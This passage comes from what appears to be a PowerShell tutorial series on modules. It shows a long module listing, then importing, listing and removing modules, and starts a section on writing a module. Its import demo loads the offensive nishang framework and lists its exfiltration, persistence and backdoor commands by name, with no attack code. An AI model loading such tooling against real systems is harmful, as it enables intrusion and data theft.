{Read-PrinterNfcTag, Write-PrinterNfcTag}\r\nCim 1.0 MSFT_PrinterPort_v1.0 {Get-PrinterPort, Remove-PrinterPort}\r\nCim 1.0 MSFT_PrinterPortTasks_v1.0 Add-PrinterPort\r\nCim 1.0 MSFT_PrinterProperty_v1.0 {Get-PrinterProperty, Set-PrinterProperty}\r\nCim 1.0 MSFT_PrintJob_v1.0 {Get-PrintJob, Remove-PrintJob, Restart-PrintJob, Resume-PrintJob...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_ProcessResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\nScript 0.0 MSFT_RegistryResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\nScript 0.0 MSFT_RoleResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 MSFT_ScheduledTask_v1.0 {Get-ScheduledTask, Unregister-ScheduledTask}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_ScriptResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\nScript 0.0 MSFT_ServiceResource {Get-TargetResource, Test-TargetResource, Set-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 MSFT_TcpIpPrinterPort_v1.0\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_UserResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\nScript 0.0 MSFT_WaitForAll {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\nScript 0.0 MSFT_WaitForAny {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\nScript 0.0 MSFT_WaitForSome {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 MSFT_WdacBidTraceTask_v1.0 {Disable-WdacBidTrace, Enable-WdacBidTrace, Get-WdacBidTrace}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_WindowsOptionalFeature {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 MSFT_WsdPrinterPort_v1.0\r\nManifest 2.0.0.0 NetAdapter {Disable-NetAdapter, Disable-NetAdapterBinding, Disable-NetAdapterChecksumOffload, Disable-NetAdapterEncapsulatedPacketTaskOffload...}\r\nScript 0.0 NetAdapter.Format.Helper {Format-MacAddress, Format-AdapterName, Format-AdapterInstanceID, Format-LinkSpeed}\r\nManifest 1.0.0.0 NetConnection {Get-NetConnectionProfile, Set-NetConnectionProfile}\r\nManifest 1.0.0.0 NetEventPacketCapture {New-NetEventSession, Remove-NetEventSession, Get-NetEventSession, Set-NetEventSession...}\r\nCim 1.0.0.0 NetFirewallAddressFilter.cmdletD... {Get-NetFirewallAddressFilter, Set-NetFirewallAddressFilter}\r\nCim 1.0.0.0 NetFirewallApplicationFilter.cmd... {Get-NetFirewallApplicationFilter, Set-NetFirewallApplicationFilter}\r\nCim 1.0.0.0 NetFirewallInterfaceFilter.cmdle... {Get-NetFirewallInterfaceFilter, Set-NetFirewallInterfaceFilter}\r\nCim 1.0.0.0 NetFirewallInterfaceTypeFilter.c... {Get-NetFirewallInterfaceTypeFilter, Set-NetFirewallInterfaceTypeFilter}\r\nCim 1.0.0.0 NetFirewallPortFilter.cmdletDefi... {Get-NetFirewallPortFilter, Set-NetFirewallPortFilter}\r\nCim 1.0.0.0 NetFirewallProfile.cmdletDefinition {Get-NetFirewallProfile, Set-NetFirewallProfile}\r\nCim 1.0.0.0 NetFirewallRule.cmdletDefinition {Get-NetFirewallRule, Set-NetFirewallRule, Remove-NetFirewallRule, Rename-NetFirewallRule...}\r\nCim 1.0.0.0 NetFirewallSecurityFilter.cmdlet... {Get-NetFirewallSecurityFilter, Set-NetFirewallSecurityFilter}\r\nCim 1.0.0.0 NetFirewallServiceFilter.cmdletD... {Get-NetFirewallServiceFilter, Set-NetFirewallServiceFilter}\r\nCim 1.0.0.0 NetFirewallSetting.cmdletDefinition {Get-NetFirewallSetting, Set-NetFirewallSetting}\r\nCim 1.0.0.0 NetGPO.cmdletDefinition {Open-NetGPO, Save-NetGPO}\r\nScript 0.0 NetIPConfiguration {Get-NetIPConfiguration, gip}\r\nCim 1.0.0.0 NetIPsecDospSetting.cmdletDefini... {Get-NetIPsecDospSetting, Set-NetIPsecDospSetting, Remove-NetIPsecDospSetting, New-NetIPsecDospSetting}\r\nCim 1.0.0.0 NetIPsecIdentity.cmdletDefinition\r\nCim 1.0.0.0 NetIPsecMainModeCryptoSet.cmdlet... {Get-NetIPsecMainModeCryptoSet, Set-NetIPsecMainModeCryptoSet, Remove-NetIPsecMainModeCryptoSet, Rename-NetIPsecMainModeCryptoSet...}\r\nCim 1.0.0.0 NetIPsecMainModeRule.cmdletDefin... {Get-NetIPsecMainModeRule, Set-NetIPsecMainModeRule, Remove-NetIPsecMainModeRule, Rename-NetIPsecMainModeRule...}\r\nCim 1.0.0.0 NetIPsecMainModeSA.cmdletDefinition {Get-NetIPsecMainModeSA, Remove-NetIPsecMainModeSA}\r\nCim 1.0.0.0 NetIPsecPhase1AuthSet.cmdletDefi... {Get-NetIPsecPhase1AuthSet, Set-NetIPsecPhase1AuthSet, Remove-NetIPsecPhase1AuthSet, Rename-NetIPsecPhase1AuthSet...}\r\nCim 1.0.0.0 NetIPsecPhase2AuthSet.cmdletDefi... {Get-NetIPsecPhase2AuthSet, Set-NetIPsecPhase2AuthSet, Remove-NetIPsecPhase2AuthSet, Rename-NetIPsecPhase2AuthSet...}\r\nCim 1.0.0.0 NetIPsecPolicyChange.cmdletDefin...\r\nCim 1.0.0.0 NetIPsecQuickModeCryptoSet.cmdle... {Get-NetIPsecQuickModeCryptoSet, Set-NetIPsecQuickModeCryptoSet, Remove-NetIPsecQuickModeCryptoSet, Rename-NetIPsecQuickModeCryptoSet...}\r\nCim 1.0.0.0 NetIPsecQuickModeSA.cmdletDefini... {Get-NetIPsecQuickModeSA, Remove-NetIPsecQuickModeSA}\r\nCim 1.0.0.0 NetIPsecRule.cmdletDefinition {Get-NetIPsecRule, Set-NetIPsecRule, Remove-NetIPsecRule, Rename-NetIPsecRule...}\r\nManifest 2.0.0.0 NetLbfo {Add-NetLbfoTeamMember, Add-NetLbfoTeamNic, Get-NetLbfoTeam, Get-NetLbfoTeamMember...}\r\nManifest 1.0.0.0 NetNat {Get-NetNat, Get-NetNatExternalAddress, Get-NetNatStaticMapping, Get-NetNatSession...}\r\nManifest 2.0.0.0 NetQos {Get-NetQosPolicy, Set-NetQosPolicy, Remove-NetQosPolicy, New-NetQosPolicy}\r\nManifest 2.0.0.0 NetSecurity {Get-DAPolicyChange, New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal...}\r\nManifest 1.0.0.0 NetSwitchTeam {New-NetSwitchTeam, Remove-NetSwitchTeam, Get-NetSwitchTeam, Rename-NetSwitchTeam...}\r\nManifest 1.0.0.0 NetTCPIP {Get-NetIPAddress, Get-NetIPInterface, Get-NetIPv4Protocol, Get-NetIPv6Protocol...}\r\nManifest 1.0.0.0 NetworkConnectivityStatus {Get-DAConnectionStatus, Get-NCSIPolicyConfiguration, Reset-NCSIPolicyConfiguration, Set-NCSIPolicyConfiguration}\r\nScript 0.0 NetworkSwitchConfiguration {Restore-NetworkSwitchConfiguration, Save-NetworkSwitchConfiguration, CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace...}\r\nScript 0.0 NetworkSwitchEthernetPort {Disable-NetworkSwitchEthernetPort, Enable-NetworkSwitchEthernetPort, Get-NetworkSwitchEthernetPort, Remove-NetworkSwitchEthernetPortIPAddres...\r\nScript 0.0 NetworkSwitchFeature {Disable-NetworkSwitchFeature, Enable-NetworkSwitchFeature, Get-NetworkSwitchFeature, CmdletShouldProcess...}\r\nScript 0.0 NetworkSwitchGlobalSettingData {Get-NetworkSwitchGlobalData, CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace, Get-NetworkSwitchImplementationNamespace...}\r\nManifest 1.0.0.0 NetworkSwitchManager {Disable-NetworkSwitchEthernetPort, Enable-NetworkSwitchEthernetPort, Get-NetworkSwitchEthernetPort, Remove-NetworkSwitchEthernetPortIPAddres...\r\nScript 0.0 NetworkSwitchVlan {Disable-NetworkSwitchVlan, Enable-NetworkSwitchVlan, Get-NetworkSwitchVlan, New-NetworkSwitchVlan...}\r\nManifest 1.0.0.0 NetworkTransition {Add-NetIPHttpsCertBinding, Disable-NetDnsTransitionConfiguration, Disable-NetIPHttpsProfile, Disable-NetNatTransitionConfiguration...}\r\nCim 1.0.0.0 OffloadDataTransferSetting Get-OffloadDataTransferSetting\r\nCim 1.0.0.0 Partition {Get-Partition, Remove-Partition, Resize-Partition, Get-PartitionSupportedSize...}\r\nManifest 1.0.0.0 PcsvDevice {Get-PcsvDevice, Start-PcsvDevice, Stop-PcsvDevice, Restart-PcsvDevice...}\r\nCim 1.0.0.0 PhysicalDisk {Get-PhysicalDisk, Enable-PhysicalDiskIdentification, Disable-PhysicalDiskIdentification, Reset-PhysicalDisk...}\r\nManifest 1.0.0.0 pki {Add-CertificateEnrollmentPolicyServer, Export-Certificate, Export-PfxCertificate, Get-CertificateAutoEnrollmentPolicy...}\r\nCim 1.0 PnpDevice {Get-PnpDevice, Enable-PnpDevice, Disable-PnpDevice, Get-PnpDeviceProperty}\r\nManifest 1.0.0.0 PnpDevice {Get-PnpDevice, Get-PnpDeviceProperty, Enable-PnpDevice, Disable-PnpDevice}\r\nManifest 0.0 PnpDevice.Resource\r\nManifest 1.1 PrintManagement {Add-Printer, Add-PrinterDriver, Add-PrinterPort, Get-PrintConfiguration...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 1.0 ProcessSet {BuildResourceCommonParameters, BuildResourceString}\r\nScript 1.0 ProcessSet {BuildResourceCommonParameters, BuildResourceString}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 PS_BackgroundTask {Get-AppBackgroundTask, Start-AppBackgroundTask, Unregister-AppBackgroundTask}\r\nCim 1.0 PS_ClusteredScheduledTask_v1.0 {Get-ClusteredScheduledTask, Register-ClusteredScheduledTask, Set-ClusteredScheduledTask, Unregister-ClusteredScheduledTask}\r\nCim 1.0.0 PS_DnsClientNRPTGlobal_v1.0.0 {Get-DnsClientNrptGlobal, Set-DnsClientNrptGlobal}\r\nCim 1.0.0 PS_DnsClientNrptPolicy_v1.0.0 Get-DnsClientNrptPolicy\r\nCim 1.0.0 PS_DnsClientNRPTRule_v1.0.0 {Add-DnsClientNrptRule, Get-DnsClientNrptRule, Remove-DnsClientNrptRule, Set-DnsClientNrptRule}\r\nCim 1.0.0 PS_EapConfiguration_v1.0.0 New-EapConfiguration\r\nCim 1.0 ps_mmagent_v1.0 {Debug-MMAppPrelaunch, Disable-MMAgent, Enable-MMAgent, Get-MMAgent...}\r\nCim 1.0 PS_ScheduledTask_v1.0 {Disable-ScheduledTask, Enable-ScheduledTask, Export-ScheduledTask, Get-ScheduledTaskInfo...}\r\nCim 1.0.0 PS_VpnConnection_v1.0.0 {Add-VpnConnection, Get-VpnConnection, Remove-VpnConnection, Set-VpnConnection}\r\nCim 1.0 PS_VpnConnectionIPsecConfigurati... Set-VpnConnectionIPsecConfiguration\r\nCim 1.0 PS_VpnConnectionProxy_v1.0 Set-VpnConnectionProxy\r\nCim 1.0 PS_VpnConnectionRoute_v1.0 {Add-VpnConnectionRoute, Remove-VpnConnectionRoute}\r\nCim 1.0 PS_VpnConnectionTrigger_v1.0 Get-VpnConnectionTrigger\r\nCim 1.0 PS_VpnConnectionTriggerApplicati... {Add-VpnConnectionTriggerApplication, Remove-VpnConnectionTriggerApplication}\r\nCim 1.0 PS_VpnConnectionTriggerDnsConfig... {Add-VpnConnectionTriggerDnsConfiguration, Remove-VpnConnectionTriggerDnsConfiguration, Set-VpnConnectionTriggerDnsConfiguration}\r\nCim 1.0 PS_VpnConnectionTriggerTrustedNe... {Add-VpnConnectionTriggerTrustedNetwork, Remove-VpnConnectionTriggerTrustedNetwork, Set-VpnConnectionTriggerTrustedNetwork}\r\nCim 1.0 PS_VpnServerAddress_v1.0 New-VpnServerAddress\r\nManifest 1.1 PSDesiredStateConfiguration {Set-DscLocalConfigurationManager, Start-DscConfiguration, Test-DscConfiguration, Publish-DscConfiguration...}\r\nScript 0.0 PSDesiredStateConfiguration {Generate-VersionInfo, Set-PSMetaConfigDocInsProcessedBeforeMeta, Get-PSMetaConfigurationProcessed, Get-PSMetaConfigDocumentInstVersionInfo...}\r\nScript 1.0.0.0 PSDiagnostics {Disable-PSTrace, Disable-PSWSManCombinedTrace, Disable-WSManTrace, Enable-PSTrace...}\r\nScript 1.0.0.0 PSDiagnostics {Disable-PSTrace, Disable-PSWSManCombinedTrace, Disable-WSManTrace, Enable-PSTrace...}\r\nScript 0.0 PSDscXMachine {Get-_InternalPSDscXMachineTR, Set-_InternalPSDscXMachineTR, Test-_InternalPSDscXMachineTR}\r\nBinary 1.1.0.0 PSScheduledJob {New-JobTrigger, Add-JobTrigger, Remove-JobTrigger, Get-JobTrigger...}\r\nManifest 2.0.0.0 PSWorkflow {New-PSWorkflowExecutionOption, New-PSWorkflowSession, nwsn}\r\nScript 0.0 PSWorkflow {New-PSWorkflowSession, nwsn}\r\nManifest 1.0.0.0 PSWorkflowUtility Invoke-AsWorkflow\r\nScript 0.0 PSWorkflowUtility Invoke-AsWorkflow\r\nCim 2.0.0.0 Remove-DscConfigurationDocument Remove-DscConfigurationDocument\r\nCim 1.0.0.0 ResiliencySetting {Get-ResiliencySetting, Set-ResiliencySetting}\r\nCim 2.0.0.0 Restore-DscConfiguration Restore-DscConfiguration\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 RunAsHelper {Get-DomainAndUserName, Import-DscNativeMethods, IsNanoServer}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 1.0.0.0 ScheduledTasks {Get-ScheduledTask, Set-ScheduledTask, Register-ScheduledTask, Unregister-ScheduledTask...}\r\nManifest 2.0.0.0 SecureBoot {Confirm-SecureBootUEFI, Set-SecureBootUEFI, Get-SecureBootUEFI, Format-SecureBootUEFI...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 1.0 ServiceSet {BuildResourceCommonParameters, BuildResourceString}\r\nScript 1.0 ServiceSet {BuildResourceCommonParameters, BuildResourceString}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 SmbBandwidthLimit {Get-SmbBandwidthLimit, Remove-SmbBandwidthLimit, Set-SmbBandwidthLimit, gsmbb...}\r\nCim 1.0 SmbClientConfiguration {Get-SmbClientConfiguration, Set-SmbClientConfiguration, gsmbcc, ssmbcc}\r\nCim 1.0 SmbClientNetworkInterface {Get-SmbClientNetworkInterface, gsmbcn}\r\nCim 1.0 SmbConnection {Get-SmbConnection, gsmbc}\r\nCim 1.0 SmbMapping {Get-SmbMapping, Remove-SmbMapping, New-SmbMapping, gsmbm...}\r\nCim 1.0 SmbMultichannelConnection {Get-SmbMultichannelConnection, Update-SmbMultichannelConnection, gsmbmc, udsmbmc}\r\nCim 1.0 SmbMultichannelConstraint {Get-SmbMultichannelConstraint, Remove-SmbMultichannelConstraint, New-SmbMultichannelConstraint, gsmbt...}\r\nCim 1.0 SmbOpenFile {Get-SmbOpenFile, Close-SmbOpenFile, gsmbo, cssmbo}\r\nScript 0.0 SmbScriptModule {Set-SmbPathAcl, Get-SmbDelegation, Enable-SmbDelegation, Disable-SmbDelegation...}\r\nCim 1.0 SmbServerConfiguration {Get-SmbServerConfiguration, Set-SmbServerConfiguration, gsmbsc, ssmbsc}\r\nCim 1.0 SmbServerNetworkInterface {Get-SmbServerNetworkInterface, gsmbsn}\r\nCim 1.0 SmbSession {Get-SmbSession, Close-SmbSession, gsmbse, cssmbse}\r\nCim 1.0 SmbShare {Get-SmbShare, Remove-SmbShare, Set-SmbShare, Block-SmbShareAccess...}\r\nManifest 2.0.0.0 SmbShare {Get-SmbShare, Remove-SmbShare, Set-SmbShare, Block-SmbShareAccess...}\r\nScript 0.0 SmbShare.Format.Helper Format-LinkSpeed\r\nManifest 2.0.0.0 SmbWitness {Get-SmbWitnessClient, Move-SmbWitnessClient, gsmbw, msmbw...}\r\nCim 1.0 SmbWitnessWmiClient {Get-SmbWitnessClient, Move-SmbWitnessClient, gsmbw, msmbw...}\r\nManifest 1.0.0.0 StartLayout {Export-StartLayout, Import-StartLayout, Get-StartApps}\r\nCim 2.0.0.0 Stop-DscConfiguration Stop-DscConfiguration\r\nManifest 2.0.0.0 Storage {Add-InitiatorIdToMaskingSet, Add-PartitionAccessPath, Add-PhysicalDisk, Add-TargetPortToMaskingSet...}\r\nCim 1.0.0.0 StorageCmdlets {Set-Disk, Set-Volume, Set-Partition, Set-PhysicalDisk...}\r\nCim 1.0.0.0 StorageEnclosure {Get-StorageEnclosure, Enable-StorageEnclosureIdentification, Disable-StorageEnclosureIdentification, Get-StorageEnclosureVendorData}\r\nCim 1.0.0.0 StorageHealth {Get-StorageHealth, Get-StorageHealthSettingInternal, Set-StorageHealthSettingInternal, Remove-StorageHealthSettingInternal}\r\nCim 1.0.0.0 StorageJob {Get-StorageJob, Stop-StorageJob}\r\nCim 1.0.0.0 StorageNode Get-StorageNode\r\nCim 1.0.0.0 StoragePool {Get-StoragePool, New-VirtualDisk, New-StorageTier, Remove-StoragePool...}\r\nCim 1.0.0.0 StorageProvider {Get-StorageProvider, Update-StorageProviderCache, Register-StorageSubsystem, Unregister-StorageSubsystem...}\r\nCim 1.0.0.0 StorageReliabilityCounter {Get-StorageReliabilityCounterDeprecated, Reset-StorageReliabilityCounter}\r\nScript 0.0 StorageScripts {CreateErrorRecord, Get-PhysicalDiskStorageNodeView, Get-DiskStorageNodeView, Get-StorageEnclosureStorageNodeView...}\r\nCim 1.0.0.0 StorageSetting {Get-StorageSetting, Set-StorageSetting, Update-HostStorageCache}\r\nCim 1.0.0.0 StorageSubSystem {Get-StorageSubSystem, New-StoragePool, New-StorageSubsystemVirtualDisk, New-MaskingSet...}\r\nCim 1.0.0.0 StorageTier {Get-StorageTier, Remove-StorageTier, Resize-StorageTier, Get-StorageTierSupportedSize}\r\nCim 1.0.0.0 TargetPort Get-TargetPort\r\nCim 1.0.0.0 TargetPortal Get-TargetPortal\r\nScript 0.0 TestDtc {Get-DAPolicyChange, New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal...}\r\nScript 0.0 Test-NetConnection {Test-NetConnection, TNC}\r\nManifest 2.0.0.0 tls {New-TlsSessionTicketKey, Enable-TlsSessionTicketKey, Disable-TlsSessionTicketKey, Export-TlsSessionTicketKey...}\r\nManifest 1.0.0.0 TroubleshootingPack {Get-TroubleshootingPack, Invoke-TroubleshootingPack}\r\nManifest 2.0.0.0 TrustedPlatformModule {Get-Tpm, Initialize-Tpm, Clear-Tpm, Unblock-Tpm...}\r\nBinary 2.1.639.0 UEV {Clear-UevConfiguration, Clear-UevAppxPackage, Restore-UevBackup, Set-UevTemplateProfile...}\r\nCim 1.0.0.0 VirtualDisk {Get-VirtualDisk, Remove-VirtualDisk, Show-VirtualDisk, Hide-VirtualDisk...}\r\nCim 1.0.0.0 Volume {Get-Volume, Format-Volume, Repair-Volume, Optimize-Volume...}\r\nManifest 2.0.0.0 VpnClient {Add-VpnConnection, Set-VpnConnection, Remove-VpnConnection, Get-VpnConnection...}\r\nManifest 1.0.0.0 Wdac {Get-OdbcDriver, Set-OdbcDriver, Get-OdbcDsn, Add-OdbcDsn...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nBinary 1.0 WebDownloadManager {Get-DscDocument, Get-DscModule, Get-DscAction, Send-DscStatus...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 1.0.0.0 WindowsDeveloperLicense {Get-WindowsDeveloperLicense, Unregister-WindowsDeveloperLicense, Show-WindowsDeveloperLicenseRegistration}\r\nScript 1.0 WindowsErrorReporting {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting}\r\nScript 1.0 WindowsErrorReporting {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 1.0 WindowsFeatureSet {BuildResourceCommonParameters, BuildResourceString}\r\nScript 1.0 WindowsFeatureSet {BuildResourceCommonParameters, BuildResourceString}\r\nScript 1.0 WindowsOptionalFeatureSet {BuildResourceCommonParameters, BuildResourceString}\r\nScript 1.0 WindowsOptionalFeatureSet {BuildResourceCommonParameters, BuildResourceString}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCClassResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 1.0 WindowsPackageCab\r\nScript 1.0 WindowsPackageCab\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 1.0.0.0 WindowsSearch {Get-WindowsSearchSetting, Set-WindowsSearchSetting}\r\nManifest 1.0.0.0 WindowsUpdate Get-WindowsUpdateLog\r\nScript 0.0 WindowsUpdateLog Get-WindowsUpdateLog\r\n\r\n\r\nPS C:\\Users\\Windows10-32>\r\n```\r\n\r\n- Loading/Importing Modules\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32> Import-Module \r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\r\nWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\r\ncommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\r\nWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Module\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}\r\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}\r\nScript 0.0 nishang {Add-Exfiltration, Add-Persistence, Add-RegBackdoor, Add-ScrnSaveBackdoor...}\r\n\r\n\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\r\n```\r\n\r\n- PSModulePath\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> $env:PSModulePath\r\nC:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\r\n```\r\n\r\n- Unloading/Removing Modules\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Module\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}\r\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}\r\nScript 0.0 nishang {Add-Exfiltration, Add-Persistence, Add-RegBackdoor, Add-ScrnSaveBackdoor...}\r\n\r\n\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Remove-Module nishang\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Module\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}\r\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}\r\n\r\n\r\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\r\n```\r\n\r\n- [Different types of Modules](https://msdn.microsoft.com/en-us/library/dd878324(v=vs.85).aspx)\r\n - Script Modules\r\n - Binary Modules\r\n - Manifest Modules\r\n - Dynamic Modules\r\n" }, { "path": "18-Modules-in-Powershell-Part-2.md", "content": "#### 18. Modules in Powershell Part 2\r\n\r\n###### Writing Modules\r\n\r\n```Show-AdvancedScript.psm1```\r\n\r\n```PowerShell\r\nfunction Show-AdvancedScript\r\n{\r\n [CmdletBinding( SupportsShouldProcess = $True)]\r\n param(\r\n [Parameter()]\r\n $Global:FilePath\r\n )\r\n\r\n Write-Verbose \"Deleting $FilePath\"\r\n if ($PSCmdlet.ShouldProcess(\"$FilePath\", \"Deleting file permanently\"))\r\n {\r\n Remove-Item $FilePath\r\n }\r\n\r\n\r\n}\r\n\r\nfunction Test-FileExistence\r\n{\r\n Test-Path $FilePath\r\n}\r\n\r\nfunction DoNoNeedToShow\r\n{\r\n Write-Output \"No Need to show this to user\"\r\n}\r\n\r\nExport-ModuleMember -Function *-*\r\n```\r\n\r\n- ```Import``` the module\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32> cd .\\Desktop\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop> Import-Module .\\Show-AdvancedScript.psm1\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop> Get-Module\r\n\r\nModuleType Version Name ExportedCommands \r\n---------- ------- ---- ---------------- \r\nScript 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet} \r\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} \r\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} \r\nScript 0.0 Show-AdvancedScript {Show-AdvancedScript, Test-FileExistence} \r\n\r\n\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop> \r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32\\Desktop> Import-Module .\\Show-AdvancedScript.psm1 -Verbose\r\nVERBOSE: Loading module from path 'C:\\Users\\Windows10-32\\Desktop\\Show-AdvancedScript.psm1'.\r\nVERBOSE: Importing function 'Show-AdvancedScript'.\r\nVERBOSE: Importing function 'Test-FileExistence'.\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop> \r\n```\r\n\r\n- List the ```functions``` of a module\r\n\r\n```PowerShell\r\nPS 